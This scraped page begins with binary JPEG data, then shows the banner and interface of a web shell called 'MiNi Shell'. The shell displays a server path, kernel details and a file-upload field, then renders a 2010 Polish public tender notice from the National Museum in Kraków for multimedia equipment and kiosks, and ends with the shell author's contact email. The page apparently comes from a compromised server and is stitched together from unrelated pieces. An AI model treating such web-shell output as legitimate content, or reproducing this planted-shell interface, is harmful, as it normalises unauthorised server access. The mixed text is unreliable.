JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100505/123868-N-2010.html

<p class="kh_header"><b>Kraków: Dostawa sprzętu multimedialnego dla Oddziału Muzeum Narodowego  w Krakowie -Sukiennice.</b><br>
<b>Numer ogłoszenia: 123868 - 2010; data zamieszczenia: 05.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe w Krakowie , Al. 3-go Maja 1, 30-062 Kraków, woj. małopolskie, tel. 012 2955621, faks 012 2955555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu multimedialnego dla Oddziału Muzeum Narodowego  w Krakowie -Sukiennice..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę sprzętu, jego zainstalowanie i uruchomienie u użytkownika.
Zamówienie obejmuje dwa zadania:
Zadanie nr 1:
Dostawa sprzętu multimedialnego wraz z jego instalacja i uruchomieniem.
Zadanie nr 2:

Dostawa kiosków multimedialnych- Publiczny punkt dostępu do Internetu, przeznaczony do instalowania wewnątrz pomieszczeń - 8 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.32.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie formułuje warunku. Wykonawca składa oświadczenie o spełnianiu  warunków udziału  w postepowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania przetargowego zostaną dopuszczeni Wykonawcy spełniający warunki udziału w postępowaniu w zakresie:

a)	posiadania wiedzy i doświadczenia tj. dla zadania nr 1 wykażą iż;
zrealizowali w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), z należytą starannością, co najmniej 1 (jedną) dostawę sprzętu multimedialnego o wartości minimalnej 200.000,00 PLN (brutto) obejmującą dostawę ,montaż i uruchomienie sprzętu;
dla zadania nr 2 wykażą iż:
zrealizowali  w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), z należytą starannością, co najmniej 1 (jedną) dostawę kiosków multimedialnych o wartości minimalnej 30.000,00 PLN (brutto);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie formułuje warunku. Wykonawca składa oświadczenie o spełnianiu  warunków udziału  w postepowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie formułuje warunku. Wykonawca składa oświadczenie o spełnianiu  warunków udziału  w postepowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie formułuje warunku. Wykonawca składa oświadczenie o spełnianiu  warunków udziału  w postepowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W ramach zadania nr 2, w celu wykazania, że oferowana dostawa odpowiada wymaganiom określonym przez Zamawiającego - załącznik nr 1 specyfikacji, Wykonawca składa wraz z ofertą prototyp kiosku - próbki o których mowa w pkt III.5 ogłoszenia.
Prototyp kiosku, w zakresie jego elementów, wyposażenia i estetyki będzie podlegał ocenie pod względem zgodności oferowanego sprzętu z opisanymi wymaganiami przez Zamawiającego w zał. Nr 1 specyfikacji. 
Zamawiający zwraca Wykonawcy, którego oferta nie została wybrana prototyp kiosku.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2)	W zawartej umowie nie jest możliwe wprowadzanie istotnych zmian w stosunku  do treści oferty po za przewidzianymi w niniejszej specyfikacji.

Warunki i okoliczności uprawniające do wniosku o zmianę.

I. Zamawiający.

1.	Zamawiający przewiduje i zastrzega sobie wprowadzenie zmiany w treści umowy w zakresie:
-  terminów  realizacji;
-  zakresu zamówienia o ile nie wpływają one istotnie na przedmiot umowy (tj. zmiany  w ilości  dostarczonego i wycenionego sprzętu)
- sposobu realizacji zamówienia o ile wpływa on pozytywnie na realizacje umowy dla obydwu stron;	
Zmiana taka uzasadniona może być przyczynami organizacyjnymi i technicznymi.
 
2.	Zamawiający na powyższy zakres przedłoży propozycję zmiany umowy w formie aneksu, którą to WYKONAWCA jest związany i nie przysługują mu w tym zakresie żadne roszczenia do Zamawiającego co do kwoty umownej, ewentualnego odszkodowania z tytułu utraty spodziewanych zysków. 


II. Wykonawca

1.	WYKONAWCA zobowiązany jest do ostrzegania Zamawiającego, tak wcześnie jak 
to możliwe, o szczególnych przyszłych wydarzeniach i okolicznościach, które mogą wpłynąć na jakość usług (w każdy sposób) lub opóźnienie w realizacji usług. Zamawiający zażąda od WYKONAWCY oceny wpływu przyszłego wydarzenia i okoliczności wpływających na datę zakończenia wykonywania dostawy.
2.	WYKONAWCA opracuje i przedstawi Zamawiającemu do akceptacji propozycje dotyczące uniknięcia lub zmniejszenia wpływu takiego wydarzenia lub okoliczności mających wpływ na realizację usług, jak też będzie współpracował przy wykonywaniu odnośnych zaleceń Zamawiającego.
3.	Okoliczności, o których mowa w ust. 1 i 2 mogą wpłynąć na zmianę treści umowy.
4. Procedura wprowadzania wszystkich zmian do umowy określonych w niniejszej umowie :  
     wniosek o zmianę każdorazowo musi zawierać:
1)	opis proponowanej zmiany 
2)	wpływ na wykonanie dostawy stanowiącej przedmiot umowy
3)	 proponowany termin wprowadzenia zmian, 
4)	należy podać  jakie znaczenie ma zmiana  dla zamawiającego lub czy jest konieczna dla wykonania umowy.
5.  Wnioski o zmianę.
Wniosek o zmianę składany przez WYKONAWCE musi wpłynąć do Zamawiającego w terminie minimum 3 dni przed planowanym wprowadzeniem zmian, pisemnie. 

Wniosek Zamawiającego składany jest do wskazanej w umowie przez WYKONAWCĘ osoby w terminie minimum na 3 dni przed wprowadzeniem  zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe w Krakowie, Al. 3-go Maja 1, 30-062 Kraków, pok. 050 sekretariat,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2010 godzina 10:00, miejsce: Muzeum Narodowe w Krakowie, Al. 3-go Maja 1, 30-062 Kraków, pok. 050 sekretariat,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt/program: finansowany ze środków Unii Europejskiej- Norweski Mechanizm Finansowy. Nazwa projektu:SUKIENNICE - Remont i modernizacja Galerii Sztuki Polskiej XIX wieku w krakowskich Sukiennicach-Nr projektu: EOG- PLOO27..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sprzętu multimedialnego wraz z jego instalacja i uruchomieniem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dla zadania 1 obejmuje w szczególności następujący sprzęt:
Projektor multimedialny wraz z obiektywem  i uchwytem montażowym 
Motoryczny ekran zwijany do przedniej projekcji kompatybilny z urządzeniem z pkt. 
Urządzenie UPS kompatybilne z urządzeniami z pkt. 1 i pkt. 2
Komputer osobisty (laptop), MYSZ BEZPRZEWODOWA kompatybilna z pkt. 4,  Torba zapewniająca ochronę komputera
Wyświetlacz z uchwytem montażowym
Prezenter multimedialny
Karta pamięci kompatybilna z pkt. 4
Przenośny projektor multimedialny
Dyktafon
Przenośny zestaw nagłośnieniowy (stereo - kolumna aktywna + pasywna)
AMPLITUNER
GŁOŚNIKI 5.1 + 2.0
MIKSER AUDIO
Mikrofon bezprzewodowy z odbiornikiem
Projektor. 
Głośniki Kierunkowe
Twardo-dyskowy odtwarzacz full HD
Głosniki
Kontroler  -  urządzenie włącza , wyłącza i kontroluje pracę wszystkich urządzeń  
Moduł przekaźników 
Monitor dotykowy LCD 21,5

(pkt 23 + 24 = kiosk multimedialny, zgodny z załączoną wizualizacją pulpitu ze stojakiem
Komputer prezentacyjny
Uchwyt sufitowy projektora 20-40 cm
Noga do monitora z mocowaniem
Switcher LAN 1x8 D-LINK
Szafa 19 24U z demontowanymi bocznymi i tylną ścianką, z wyposażeniem (panele zasilające, wentylacyjne)
Szafa 19 24U z demontowanymi bocznymi i tylną ścianką, z wyposażeniem (panele zasilające, wentylacyjne)
Ekran przenośny na stojaku + torba transportowa
Prysznic dźwiękowy, wzmacniacz
Monitor, zestaw montażowy
System muzyczny nagłośnieniowy
Przenośny system muzyczny
Bezprzewodowy system transmisji audio (2 nadajniki + 12 odbiorników + ładowarka walizkowa)
Zestaw nagłaśniający dla przewodników
Zestaw kina domowego, dźwięk dookolny w systemie 5.1
System muzyczny
Okablowanie systemu audio i video.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa kiosków multimedialnych- Publiczny punkt dostępu do Internetu, przeznaczony do instalowania wewnątrz pomieszczeń - 8 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podstawowe dane techniczne:

Zasilanie: 110-230V 50Hz 

Jednostka centralna:
Komputer z chłodzeniem pasywnym o parametrach nie gorszych niż: 
Procesor:  1,6 GHz
Pamięć 1 GB DDR2 RAM
Pamięć 2 GB typu DOM lub Flash
Ethernet 10  100 1000, WiFi
W panelu umieszczone gniazdo jack celem podpięcia słuchawek.

Monitor 19 z ekranem dotykowym w technologii fali powierzchniowej SAW
Minimalne parametry: rozdzielczość 1280 x 1024 , jasność 300, kontrast 700:1, czas reakcji 8 ms, kąty 160 160, 

Maksymalne wymiary zewnętrzne: 510 mm x 430 mm x 100 mm (szer., wys., głęb.) (bez podstawy)
Obudowa dwuczęściowa, zamykana na zamek patentowy.
Część przednia obudowy wykonana ze stali nierdzewnej szlifowanej o wysokiej estetyce wykonania. Wymagana będzie dokładność i jakość wykończenia obudowy: szczelne i dokładne dopasowanie elementów, stabilność i trwałość obudowy i podstawy oraz wysoki poziom wzornictwa kiosku. 
Wersja z przeznaczeniem do postawienia na blacie, biurku itp. (podstawa demontowalna)
Konstrukcja urządzenia oraz lokalizacja podzespołów zapewniają ma dodatkowo możliwość jego montażu na ścianie wprost na standardowych gniazdach zasilających 230V i sieciowym LAN - kiosk wyposażony w obszerną wnękę mieszczącą gniazda i wtyczki nie kolidujące z podzespołami elektronicznymi panelu.
Część przednia modułu wyświetlacza otwierana dzięki czemu zagwarantowany jest łatwy dostęp serwisowy do podzespołów.

Preinstalowane oprogramowanie  - Linux..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com